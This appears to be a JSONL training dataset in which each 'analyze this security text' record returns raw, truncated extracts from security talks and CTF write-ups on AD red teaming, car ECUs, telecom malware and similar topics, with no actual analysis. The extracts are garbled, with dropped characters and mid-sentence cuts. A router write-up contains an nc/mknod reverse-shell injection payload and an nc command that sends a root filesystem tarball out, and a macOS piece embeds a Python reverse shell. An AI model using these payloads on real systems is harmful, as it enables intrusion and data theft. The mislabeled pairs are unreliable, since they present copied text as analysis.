Admin weblogin: gives a lot of control:  Disable 2-Step Verification / Reset Password  Reveal Temporary Passwords  Create and Modify Privileges/Roles  Create/Control Mailing Lists on Target Domain  Generate Domain Reports What About GMail?  Personal Google accounts are also at risk:  Full access to Google Drive, Calendar, GMail, etc.  Ability to add recovery address and change password  Account setting manipulation for espionage Ways to Obtain weblogin: 1. Legitimate Android Token Request 2. Direct Account DB Query (root access) 3. Physical Device Access (auto sign-in) 4. Extract DB from Device Memory PoC App Iterations 1. TubeApp: Retrieve Domain OAuth secret  Advertised as a YouTube downloader  Does not upload credentials 2. Stock View: Steal weblogin: tokens  Advertised as a Stock Viewer  weblogin: token is u", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n钓鱼城杯-WP Author:Nu1L Team 钓鱼城杯-WP Crypto confused_flag crypto0 WEB easyseed easyweb gamebox zblog RE Faker Goodbye reg APK LinkChecker PWN fsplayground unknown veryeasy Misc whitespace 张三的恶行 Crypto confused_flag #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * # context.log_level = 'debug' flag = [{} for _ in range(48)] candidates = [] for _ in range(1000): try: io = remote('119.3.45.222', 9999) tmp = io.recvline().strip() if tmp.startswith(b'flag{'): candidates.append(tmp) # print(tmp) for idx, value in enumerate(tmp): if value in flag[idx].keys(): flag[idx][value] += 1 else: flag[idx][value] = 1 io.close() except: crypto0 pass for i in range(48): tmp = list(flag[i].items()) tmp = sorted(tmp, key=lambda x: x[1], reverse=True) print(list(map(lambda x: (chr(x[0]), x[1]), tmp))[:3]) for candidate in candidates: print(candidate) #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * import fuckpy3 # context.log_level = 'debug' import string table = string.printable.encode() def byte_xor(ba1, ba2): return bytes([_a  _b for _a, _b in zip(ba1, ba2)]) def hex_xor(h1, h2): return byte_xor(h1.unhex(), h2.unhex()).hex().encode() io = remote('122.112.254.205', 10003) io.sendlineafter('> ', '1') io.sendlineafter(': ', '00'*16) c = io.recvline().strip() c0 = c[:32] iv = c[-32:] io.sendlineafter('> ', '1') io.sendlineafter(': ', hex_xor('00'*16, iv)) c = io.recvline().strip() c00 = c[:32] iv = c[-32:] # flag = b'' # for i in range(16): # flag_iv = c00[-(i+1)*2:] # io.sendlineafter('> ', '1') # io.sendlineafter(': ', hex_xor('00'*16, iv) + hex_xor(c00, '00'*(15-i))) # c = io.recvline().strip() # c0 = c[32:64] # iv = c[-32:] # std = c0 # print(c0, iv) # for candidate in table: # io.sendlineafter('> ', '1') # io.sendlineafter(': ', hex_xor('00'*16, iv) + hex_xor(c00, b'00'*(15- i)+hex_xor(flag.hex().encode() + # hex(candidate)[2:].zfill(2).encode(), flag_iv))) # c = io.recvline().strip() # c0 = c[32:64] # iv = c[-32:] # if c0 == std: # print(candidate) # flag +=", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeyond the MCSE: Red Teaming Active Directory Sean Metcalf (@Pyrotek3) s e a n @ adsecurity . org www.ADSecurity.org About Me Founder Trimarc, a security company. Microsoft MCM (AD) & MVP Speaker: BSides, Shakacon, Black Hat, DEF CON, DerbyCon Security Consultant / Researcher Own & Operate ADSecurity.org (Microsoft platform security info) | @PryoTek3 | sean @ adsecurity.org | Agenda Key AD Security components Offensive PowerShell Bypassing PowerShell security Effective AD Recon AD Defenses & Bypasses Security Pros Checklist | @PryoTek3 | sean @ adsecurity.org | Hacking the System PS> Get-FullAccess | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | | @PryoTek3 | sean @ adsecurity.org | https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/ | @PryoTek3 | sean @ adsecurity.org | Differing Views of Active Directory Administrator Security Professional Attacker Complete picture is not well understood by any single one of them | @PryoTek3 | sean @ adsecurity.org | AD Security in ~15 Minutes | @PryoTek3 | sean @ adsecurity.org | Forests & Domains Forest Single domain or collection of domains. Security boundary. Domain Replication & administrative policy boundary. | @PryoTek3 | sean @ adsecurity.org | https://technet.microsoft.com/en-us/library/cc759073%28v=ws.10%29.aspx | @PryoTek3 | sean @ adsecurity.org | Trusts  Connection between domains or forests to extend authentication boundary (NTLM & Kerberos v5).  Exploit a trusted domain & jump the trust to leverage access.  Privilege escalation leveraging an exposed trust password over Kerberos (ADSecurity.org). | @PryoTek3 | sean @ adsecurity.org | Cloud Connectivity Corporate networks are connecting to the cloud. Often extends corporate network into cloud. Authentication support varies. Security posture often dependent on cloud services. | @PryoTek3 | sean @ adsecurity.org | Sit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n|=-----------------------------------------------------------------------=| |=----------------------=[ Hijacking RDS-TMC Traffic ]=------------------=| |=----------------------=[ Information signal ]=------------------=| |=-----------------------------------------------------------------------=| |=-----------------------------------------------------------------------=| |=-----------------=[ By Andrea \"lcars\" Barisani ]=--------------=| |=-----------------=[ <lcars_at_inversepath_dot_com> ]=--------------=| |=-----------------=[ ]=--------------=| |=-----------------=[ Daniele \"danbia\" Bianco ]=--------------=| |=-----------------=[ <danbia_at_inversepath_dot_com> ]=--------------=| |=-----------------------------------------------------------------------=| --[ Contents 1. - Introduction 2. - Motivation 3. - RDS 4. - RDS-TMC 5. - Sniffing circuitry 6. - Simple RDS Decoder 0.1 7. - Injection circuitry I. - References II. - Links --[ 1. Introduction Modern Satellite Navigation systems use a recently developed standard called RDS-TMC (Radio Data System - Traffic Message Channel) for receiving traffic information over FM broadcast. The protocol allows communication of traffic events such as accidents and queues. If information affects the current route plotted by the user the information is used for calculating and suggesting detours and alternate routes. We are going to show how to receive and decode RDS-TMC packets using cheap homemade hardware, the goal is understanding the protocol so that eventually we may show how trivial it is to inject false information. We also include the first release of our Simple RDS Decoder (srdsd is the lazy name) which as far as we know is the first open source tool available which tries to fully decode RDS-TMC messages. It's not restricted to RDS-TMC since it also performs basic decoding of RDS messages. The second part of the article will cover transmission of RDS-TMC messages, satellite navigator hacking via TMC and its impact for soc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKen Lee @echain A Brain-Friendly Guide Head First CVE + Who is Ken? * Former Product Developer * Chief Security Officer (WIP) * Head of Synology SIRT https://www.synology.com/security + 2013 The Phantom Menace * Started working in 2013/01 * No developer to respond to vulnerabilities * Lacked a sense of cybersecurity * High-profile CVEs were notified by customers + 2014 Revenge of the Sith * Severely affected by you-know-who * Built a working group for cybersecurity * Built private Bounty Program * Deployed security mitigations to DSM 5 + 2016 The Empire Strikes Back * Built Vulnerability Response Program * Built invitation-only Bounty Program * Reported critical flaws of Photo Station * Disclosed vulnerabilities w/o confirmation + 2017 Return of the Jedi * Authorized as the CNA * Built Incident Response Program * Announced Security Bug Bounty Program * Built Product Security Assurance Program + Agenda * 00 | Common Vulnerabilities and Exposures * 01 | CVE Numbering Authority * 10 | Phrasing and Counting Rules * 11 | Tool for dummies https://cve.mitre.org/news/archives/2019/news.html https://cve.mitre.org/cve/cna/rules.html https://cve.mitre.org/cve/cna/rules.html [CWE] in [CPE] allows [ATTACKER] to have IMPACT via [CAPEC]. + MITREs Template * [VULNTYPE] in [COMPONENT] in [VENDOR] * [PRODUCT] [VERSION] allows [ATTACKER] * to [IMPACT] via [VECTOR]. * [COMPONENT] in [VENDOR] [PRODUCT] * [VERSION] [ROOT CAUSE], which allows * [ATTACKER] to [IMPACT] via [VECTOR]. https://cveproject.github.io/docs/content/key-details-phrasing.pdf + Version * List vulnerable version * - 1.2.3 * - 1.2.3, 2.3.1, and 3.1.2 + Version * List vulnerable version * Earlier versions are affected * - 1.2.3 and earlier * - 1.2.3, 2.3.1, 3.1.2, and earlier + Version * List vulnerable version * Earlier versions are affected * Fixed or updated version * - before 1.2.3 * - before 1.2.3, 2.x before 2.3.1, and 3.x before 3.1.2 + Version * List vulnerable version * Earlier versions are affected * Fixed or u", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJohn@johnthunder.one 那就做個綿羊牆好了! http://www.directsystems.com/support/diff_h http://www.cisco.com/c/dam/en/us/support/do cs/switches/catalyst-6500-series- switches/10570-41d.gif Acce sPoi nt PC_A PC_B AP PC_A PC_B", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWe are Here to Help: How FIPS 140 Helps (and Hurts) Security Agenda  Who Am I?  Background  What is FIPS 140?  How the validation process works  Look at the Requirements  Best/Worst of the Requirements  What does the future hold?  Closing/Q&A Who is l0stkn0wledge?  Work directly with FIPS 140  Over five years experience  Seen hundreds of various implementations  Outside Interests  Programmer  Lock picker  Security Enthusiast Why am I Here?  Want to shine a new light on security standards  Standards often maligned by people as meaningless  I suggest they are a good starting point  Some guidance better than none at all  Standards don't protect against everything  Standards become dated take long to maintain  Enforcement is still on the administrator or end-user  Can provide a false sense of security What is FIPS 140?  Federal Information Processing Standard 140  Defines requirements for cryptographic systems for use in sensitive government systems  Cryptographic Module Validation Program (CMVP)  National Institute of Standards and Technology  Communications Security Establishment of Canada  Has begun seeing acceptance in other non- government arenas Past, Present, and Future of FIPS 140  Previous revision was FIPS 140-1  Originally published in 1994  Items tested under this standard are still valid  The current standard if FIPS 140-2  Originally published in 2001  The future is with FIPS 140-3  Currently in draft form, publishing date unknown  Drafting of the standard began in 2005 How Does the Process Work?  Validations are handled by three parties  Product vendors  Accredited Labs (Over 15 labs exist)  CMVP (both NIST and CSEC)  Number of labs leads to variance in the testing process  Government reviews lab reports and issues certificates Diving into the Requirements  Three key components to FIPS 140-2  FIPS 140-2 Standard  FIPS 140-2 Derived Test Requirements (DTR)  FIPS 140-2 Implementation Guidance (IG)  Requirements are divided into eleven sections  Four increas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1998 Mark Harrison. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" SCCS: @(#) msgcat.n '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '\\\" Start of description of a specific option. cmdName gives the '\\\" option's name as specified in the class command, dbNa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n>> 0 >> 1 >> 2 >> 3 >> 4 >> Making of The DEFCON Documentary Jason Scott & Rachel Lovinger DEF CON 21, August 2, 2013 >> 0 >> 1 >> 2 >> 3 >> 4 >> e f g h I. HOW IT BEGAN >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> e f g h I agreed to do it, but some questions remained... >> 0 >> 1 >> 2 >> 3 >> 4 >> How do you film hundreds of activities, happening simultaneously over 4 days? >> 0 >> 1 >> 2 >> 3 >> 4 >> How do you film people who have traditionally rejected media attention? >> 0 >> 1 >> 2 >> 3 >> 4 >> How do you capture the spirit of DEFCON  past and present? >> 0 >> 1 >> 2 >> 3 >> 4 >> How do you put it all together in 6 months? >> 0 >> 1 >> 2 >> 3 >> 4 >> e f g h II. PLANNING >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> DEFCON 18 DEFCON 16 DEFCON 19 >> 0 >> 1 >> 2 >> 3 >> 4 >> Jasons High School Yearbook Photo [Photo taken by Rachel!] >> 0 >> 1 >> 2 >> 3 >> 4 >> e f g h How do you film hundreds of activities, happening simultaneously over 4 days? >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> e f g h How do you film people who have traditionally rejected media attention? >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> e f g h III. PRE-PRODUCTION >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 >> 3 >> 4 >> e f g h Meet the crew >> 0 >> 1 >> 2 >> 3 >> 4 >> Alex Drew Eddie Kyle Rick Steve Jason Rachel >> 0 >> 1 >> 2 >> 3 >> 4 >> Prepping them for DEFCON  Start walking a little every day  Watch Comic-Con Episode IV: A Fan's Hope  Bring comfortable clothes and shoes  Look over the schedule from last year  Respect security and privacy concerns  Stay fueled and hydrated >> 0 >> 1 >> 2 >> 3 >> 4 >> Eddie Codel >> 0 >> 1 >> 2 >> 3 >> 4 >> e f g h Meet the equipment >> 0 >> 1 >> 2 >> 3 >> 4 >> The Gear  3x Canon Vixia HFG10  2x Canon 5D  1x Canon 7", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAlberto Garcia Illera (@algillera) Javier Vazquez Vidal (@bi0h4z4rd_) Javier Vázquez Vidal  Hardware security specialist  Loves breaking toys security  Freelance  From Cádiz Alberto García Illera Index  Hacking of the ECU  Do a forensic job after a car crash Why did this happen?  A friend kept bugging me to constantly change the tuning file on his car every week  I felt like What did we do?  Use Google It didnt work, so we needed a plan Vehicle Electronic Control Units Vehicle Electronic Control Units  Each ECU has an unique ID (address) in the network.  They have authentication/encryption protection against non authorised (dealer) access.  Data is usually stored in them for diagnose/foresinc purposes, aswell as for car behaviour (configuration). Vehicle communication protocols Why was K-Line the chosen one?  Can be implemented with a single level shifter IC  Present in most cars (<2010)  Older ECUs (K-Line+CAN) are cheaper than newer ones (CAN only)  Its suitable for lazy developers (Yay!) Is it easy to implement CANbus support?  We have already done it, but the beta tool is not yet ready for showcase.  CANbus and K-Line are just protocols, but the encryption, auth and all other security features are the same on both, and not specific to CANbus.  It makes the tool $10 more expensive First steps  What did we know about ECUs:  They are expensive  They live inside cars (no wild ECUs have been spotted so far)  Options we had:  Navigate through tecnical docs until we could understand how it works  Hook up the LA and try to figure out  Both of the previous answers are correct So, this is what we found about engine ECUs  Responsible for engine management  Stores all engine faults  Holds immobilizer routines  Contains firmware that affects the behaviour of the car So, this is what we found about engine ECUs  Target Hardware is composed of:  Internal/External Flash  Internal/External EEPROM  A really annoying black rubber-like epoxy What did the LA show? What did we do abou", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 18 Malware Freakshow 2 Nicholas J. Percoco & Jibran Ilyas Copyright Trustwave 2010 Agenda  About Us  Introduction  Whats a Malware Freakshow?  Anatomy of a Successful Malware Attack  Sample Analysis + Victim + Demo  Sample SL2009-127  Memory Rootkit Malware  Sample SL2010-018  Windows Credential Stealer  Sample SL2009-143  Network Sniffer Rootkit  Sample SL2010-007  Client-side PDF Attack  Conclusions Copyright Trustwave 2010 About Us Nicholas J. Percoco / Senior Vice President at Trustwave  15 Years in InfoSec / BS in Computer Science  Built and Leads the SpiderLabs team at Trustwave  Interests:  Targeted Malware, AFack PrevenHon, Mobile Devices  Business / Social Impact Standpoint Jibran Ilyas / Senior Security Consultant at Trustwave  8 Years in InfoSec / Masters in Infotech Management from Northwestern University  Interests:  AnHforensics, ArHfact Analysis, Real Hme Defense Copyright Trustwave 2010 Introduction We had a busy year!!  Over 200 incidents in 24 different countries  Hundreds of Samples to pick from  We picked the most interesHng for you New Targets This Year  Sports Bar in Miami  Online Adult Toy Store  InternaHonal VoIP Provider  US Defense Contractor Malware Developers were busy upda@ng/improving their code  Many improvements to avoid detection  Maybe they saw our Freakshow last year  Copyright Trustwave 2010 Whats a Malware Freakshow? We have access to breached environments  These environments contain valuable data  Smash and Grab is old school  AFackers spend average of 156 before geXng caught  With Hme, comes exploraHon and development  Custom and Targeted Malware is the Norm, not the excepHon  Gather and perform analysis on each piece of Malware  A Malware Freakshow demos samples to the security community  Benefit: Learn the sophis@ca@on of the current threats  Goal: Rethink the way we alert and defend!!! Copyright Trustwave 2010 Anatomy of a Successful Malware Attack Malware development takes a methodical approach  Step 1: IdenHfying the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 zacnday ndaygetshellgetshell 0x01 getshell nday stampcookie stamp cookiecookie rce ping ping target 1. whoamiping 2. pwdping 3. bashshshell shell {\"method\":\"ping\",\"params\":{\"count\":\"1\",\"size\":\"256\",\"target\":\"`mknod backpipe p && nc xxxx 9999 0<backpipe | /bin/sh 1>backpipe `www.guahao.com\",\"noParse\":true}} shellnc nc tar czvf bak.tar.gz / nc xxxx 9999 < bak.tar.gz nc -l 9999 > bak.tar.gz 0x02 nday webweb apivscodeapi rom/usr/lib/lua/luci stamp 1. \"stamp\" 2. rom/usr/lib/lua/lucilua dispatcher.luastamp stamp timegetMd5 getMd5\"\" md5auth\"\"\"special\" lua\"\" nil 0x03 sw binwalkbinwalk pwnbinwalkswpwn swpwndockerpwn binwalk gz rootfs.ubiubiubiread ubireader_extract_files rootfs.ubi warn ubifs-root fofa url urlinit.lua weburl/web gz web/web/init.lua controlleraction /web/init.lua/unauthenticate.unauthenticate/checkNat controllerunauthenticate.unauthenticateactioncheckNat controllerrouters url /web/init.lua/ac.acpermission.admin_apManage/addAuthAp 500 init.lua page.beforeAction page.beforeActionunauthenticate.unauthenticatecontroller controller action rce 0x04 rcephplua nwlua LUA WEB APPLICATION SECURITY VULNERABILITIES Lua Code: Security Overview and Practical Approaches to Static Analysis", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nopen -a /System/Applications/Calculator.app // open /System/Applications/Calculator.app // open -a /Applications/Safari.app https://www.baidu.com //safari open http://www.baidu.com/System/Applications/Calculator.app http://www.baidu.com/System/Applications/Calculator.app open 0x00 0x01 open 0x02  open -a http://www.baidu.com/System/Applications/Calculator.app open -a telnet://www.baidu.com/System/Applications/Calculator.app  open ftp://8.8.8.8/System/Applications/Calculator.app    0x03 open -a /usr/bin/curl #include <stdio.h> #include <stdlib.h> int main(){ char* cmd = \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"1 27.0.0.1\\\",10000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\" ,\\\"-i\\\"]);'\"; system(cmd); } open -a /Users/miku/tmp/testC open /Users/miku/tmp/testC  open http://www.baidu.com/Users/miku/tmp/testC open http://www.baidu.com/Users/miku/tmp/testC.app 0x04", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 端口与对应服务清单 在[计算机常用端口号汇总](https://blog.csdn.net/qq_29229567/article/details/84636959)一文的基础上进行修改以作备忘感谢原作者 ## 计算机常用端口 HTTP80HTTP DHCP服务器端的端口号是67 DHCP客户机端的端口号是68 POP3POP3仅仅是接收协议POP3客户端使用SMTP向服务器发送邮件POP3所用的端口号是110 SMTP端口号是25SMTP真正关心的不是邮件如何被传送而只关心邮件是否能顺利到达目的地SMTP具有健壮的邮件处 理特性这种特性允许邮件依据一定标准自动路由SMTP具有当邮件地址不存在时立即通知用户的能力并且具有在一定 时间内将不可传输的邮件返回发送方的特点 Telnet端口号是23Telnet是一种最老的Internet应用起源于ARPNET它的名字是电信网络协议 Telecommunication Network Protocol的缩写 FTPFTP使用的端口有20和2120端口用于数据传输21端口用于控制信令的传输控制信息和数据能够同时传输这是 FTP的特殊这处FTP采用的是TCP连接 TFTP端口号69使用的是UDP的连接 DNS53名称服务 NetBIOS137,138,139,其中137138是UDP端口当通过网上邻居传输文件时用这个端口而139端口通过这个端口进入 的连接试图获得NetBIOS/SMB服务这个协议被用于windows文件和打印机共享和 SAMBA还有WINS Regisrtation也用它 NNTP 网络新闻传输协议119 SNMP简单网络管理协议161端口 RPC远程过程调用服务135端口 QQ使用8000(服务端)和4000端口客户端 21 端口21 端口主要用于FTPFile Transfer Protocol文件传输协议服务 23 端口23 端口主要用于Telnet远程登录服务是Internet上普遍采用的登录和仿真程序 25 端口25 端口为SMTPSimple Mail Transfer Protocol简单邮件传输协议服务器所开放主要用于发送邮件如 今绝大多数邮件服务器都使用该协议 53 端口53 端口为DNSDomain Name Server域名服务器服务器所开放主要用于域名解析DNS 服务在NT 系统中 使用的最为广泛 6768 端口6768 端口分别是为Bootp 服务的Bootstrap Protocol Server引导程序协议服务端和Bootstrap Protocol Client引导程序协议客户端开放的端口 69 端口TFTP 是Cisco 公司开发的一个简单文件传输协议类似于FTP 79 端口79 端口是为Finger 服务开放的主要用于查询远程主机在线用户操作系统类型以及是否缓冲区溢出等用户的 详细信息 80 端口80 端口是为HTTPHyperText Transport Protocol超文本传输协议开放的这是上网冲浪使用最多的协议 主要用于在WWWWorld Wide Web万维网服务上传输信息的协议 99 端口99 端口是用于一个名为Metagram Relay亚对策延时的服务该服务比较少见一般是用不到的 109110 端口109 端口是为POP2Post Office Protocol Version2邮局协议2服务开放的110 端口是为POP3邮 件协议3服务开放的POP2POP3 都是主要用于接收邮件的 111 端口111 端口是SUN 公司的RPCRemote Procedure Call远程过程调用服务所开放的端口主要用于分布式系 统中不同计算机的内部进程通信RPC 在多种网络服务中都是很重要的组件 113 端口113 端口主要用于Windows 的Authentication Service验证服务 119 端口119 端口是为Network News Transfer Protocol网络新闻组传输协议简称NNTP开放的 135 端口135 端口主要用于使用RPCRemote Procedure Call远程过程调用协议并提供DCOM分布式组件对象模型 服务 137 端口137 端口主要用于NetBIOS Name ServiceNetBIOS名称服务 139 端口139 端口是为NetBIOS Session Service提供的主要用于提供Windows 文件和打印机共享以及Unix 中的 Samba 服务 143 端口143 端口主要是用于Internet Message Access Protocolv2Internet 消息访问协议简称IMAP 161 端口161 端口是用于Simple Network Managem", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n411: A Framework for Managing Security Alerts Kai Zhong @sixhundredns kai@etsy.com Kenneth Lee @kennysan ken@etsy.com Kai Zhong @sixhundredns kai@etsy.com Kenneth Lee @kennysan ken@etsy.com Get 411 here: https://github.com/kiwiz/411/ Slides: https://speakerdeck.com/kennysan/411-a- framework-for-managing-security-alerts", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Hash Attack概述 常见的Hash函数的攻击方法主要有 - 暴力攻击不依赖于任何算法细节仅与Hash值长度有关 - 生日攻击法(Birthday Attack)没有利用Hash函数的结构和任何代数弱性质只依赖于消息摘要的长度即Hash值的长度 - 中点交会攻击法(Meet-In-The-Middle)是生日攻击的一种变形不比较Hash值而是比较中间变量这种攻击主要适用于攻击具有分组链结构的Hash方案 - 密码分析依赖于具体算法的设计缺点 ### 暴力攻击工具 **HashCat 工具** 可以说是目前最好的基于 CPU 和 GPU 破解 Hash 的软件相关链接如下 [HashCat 官网](http://www.hashcat.net/hashcat/) [HashCat 简单使用](http://www.freebuf.com/sectool/112479.html) ### 哈希长度拓展攻击hash length extension attacks介绍 基本定义如下源自[维基百科](https://zh.wikipedia.org/wiki/%E9%95%BF%E5%BA%A6%E6%89%A9%E5%B1%95%E6%94%BB%E5%87%BB) 哈希长度扩展攻击(Hash Length Extension Attacks)是指针对某些允许包含额外信息的加密散列函数的攻击手段该攻击适用于在**消息与密钥的长度已知**的情形下所有采取了 H(key  message) 此类构造的散列函数MD5和SHA-1 等基于 MerkleDamgård 构造的算法均对此类攻击显示出脆弱性 这类哈希函数有以下特点 - 消息填充方式都比较类似首先在消息后面添加一个1然后填充若干个0直至总长度与 448 同余最后在其后附上64位的消息长度填充前 - 每一块得到的链接变量都会被作为下一次执行hash函数的初始向量IV在最后一块的时候才会将其对应的链接变量转换为hash值 一般攻击时应满足如下条件 - 我们已知 key 的长度如果不知道的话需要爆破出来 - 我们可以控制 message 的消息 - 我们已经知道了包含 key 的一个消息的hash值 这样我们就可以得到一对(messge,x)满足x=H(key  message)虽然我们并不清楚key的内容 ### 哈希长度拓展攻击hash length extension attacks原理 这里不妨假设我们我们知道了 hash(key+s) 的 hash 值其中 s 是已知的那么其本身在计算的时候必然会进行填充那么我们首先可以得到 key+s 扩展后的字符串 now即 now=key|s|padding 那么如果我们在 now 的后面再次附加上一部分信息extra即 key|s|padding|extra 这样再去计算hash值的时候 1. 会对 extra 进行填充直到满足条件 2. 先计算 now 对应的链接变量 IV1而我们已经知道这部分的 hash 值并且链接变量产生 hash 值的算法是可逆的所以我们可以得到链接变量 3. 下面会根据得到的链接变量 IV1对 extra 部分进行哈希算法并返回hash值 那么既然我们已经知道了第一部分的 hash 值并且我们还知道 extra 的值那么我们便可以得到最后的hash值 而之前我们也说了我们可以控制 message 的值那么其实 spaddingextra 我们都是可以控制的所以我们自然可以找到对应的(message,x)满足x=hash(key|message)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvancing Video Attacks with video interception, recording, and replay Defcon 17 July 31st, 2009 Jason Ostrom Arjun Sambamoorthy  2008 Sipera Systems, Inc. All Rights Reserved. Agenda Introduction Overview of UC Live demo of Video Eavesdropping Live demo of Video Replay and Video Hijack VoIP Pentesting trick Conclusion DefCon 17 2 Sipera Confidential - Do not reproduce or distribute without express written consent  2008 Sipera Systems, Inc. All Rights Reserved. Introduction About VIPER Lab VIPER ~ Voice over IP Exploit Research Security research lab dedicated to finding New UC / VoIP attack vectors Structural vulnerabilities in insecure protocol / deployment / configuration Penetration testing team specialized in VoIP / UC Security Passionate about VoIP / UC Security Replicated a production, enterprise network in VIPER Lab Security assessment professionals supported by research and exploit developers DefCon 17 3 Sipera Confidential - Do not reproduce or distribute without express written consent  2008 Sipera Systems, Inc. All Rights Reserved. Introduction Who we are  Jason  Arjun DefCon 17 4 Sipera Confidential - Do not reproduce or distribute without express written consent  2008 Sipera Systems, Inc. All Rights Reserved. Agenda Introduction Overview of UC UC Definition UC Business Cases New UC Attacks Live demo of Video Eavesdropping Live demo of Video Replay and Video Hijack VoIP Pentesting trick Conclusion DefCon 17 5 Sipera Confidential - Do not reproduce or distribute without express written consent  2008 Sipera Systems, Inc. All Rights Reserved. What is UC? Unified Communications Voice (VoIP) Video (IP Video) Presence and IM CTI (Computer Telephony Integration)  Desktop Integration Unified Messaging Voice mail and Email in the same Inbox! DefCon 17 6 Sipera Confidential - Do not reproduce or distribute without express written consent  2008 Sipera Systems, Inc. All Rights Reserved. The Business Risk Today our presentation will focus on IP Video exploits Low awa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuthor: Ömer Coşkun Why Nation-State Malwares Target Telco Networks: Dissecting Technical Capabilities of Regin and Its Counterparts The supreme art of war is to subdue the enemy without fighting. Sun Tzu Outline  Overview  Telecom Network Architecture  Practical Attack Surfaces  GRX Attack Vectors  SS7 Attack Vectors  Practical Attack Scenarios  Rootkit Attacks: Regin and its counterparts  Common Rootkit Techniques and Regin  Regin vs. Uruborus and Duqu  Demo: PoC || GTFO  Questions ? 1 $ whoami Ömer Coşkun (@0xM3R)  BEng. Computer Science Research Assistant in Quantum Cryptography & Advanced Topics in AI 2  Industry Experience KPN  CISO , Ethical Hacking Verizon  Threat & Vulnerability Management IBM ISS  Threat Intelligence  Interests Algorithm Design, Programming, Cryptography, Reverse Engineering, Malware Analysis, OS Internals, Rootkits $ REDteam 3 Motivations 4  Analyze existing vulnerabilities and attack surface of GSM networks  Governments hack their own citizens  Surveillance implants shifted focus to telecom networks and network devices  European Telco companies are really paranoid after Regin 